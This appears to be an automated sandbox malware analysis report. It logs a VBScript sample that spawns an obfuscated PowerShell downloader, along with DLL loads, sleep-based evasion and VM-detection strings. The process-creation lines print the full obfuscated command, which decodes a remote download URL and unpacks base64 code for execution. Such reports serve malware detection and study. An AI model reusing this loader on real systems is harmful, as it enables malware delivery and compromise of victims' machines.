Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: re.pdbM source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Core.pdbS source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1530197727.000001C5ECC80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb4 source: powershell.exe, 00000002.00000002.1529537443.000001C5ECAC1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Noshe", "0")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($Chromeplated) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") {

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B2609CA push E85E455Dh; ret	2_2_00007FFB4B2609F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B260A18 push E95B64D0h; ret	2_2_00007FFB4B2609C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B2600BD pushad ; iretd	2_2_00007FFB4B2600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFB4B260962 push E95B64D0h; ret	2_2_00007FFB4B2609C9

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3770			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6098			Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 2072	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: wscript.exe, 00000000.00000002.1375520650.0000013D6CFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.1372110678.0000013D6D2C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW$D%SystemRoot%\system32\mswsock.dllDeliM sildeGavebt Bomba pre,lProdul Medli TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg PlejeBegrunNonskdAffe.eCutar
Source: wscript.exe, 00000000.00000003.1371981845.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365525218.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364056176.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375690007.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363491376.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373454782.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363852731.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1370814268.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5:HN
Source: wscript.exe, 00000000.00000003.1372256990.0000013D6B1A9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\(
Source: wscript.exe, 00000000.00000002.1375520650.0000013D6CFD0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: wscript.exe, 00000000.00000003.1371981845.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363955829.0000013D6D29D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1365525218.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373978374.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1364056176.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375690007.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1375982993.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363491376.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1373454782.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1371739261.0000013D6D2C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1363852731.0000013D6D03A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

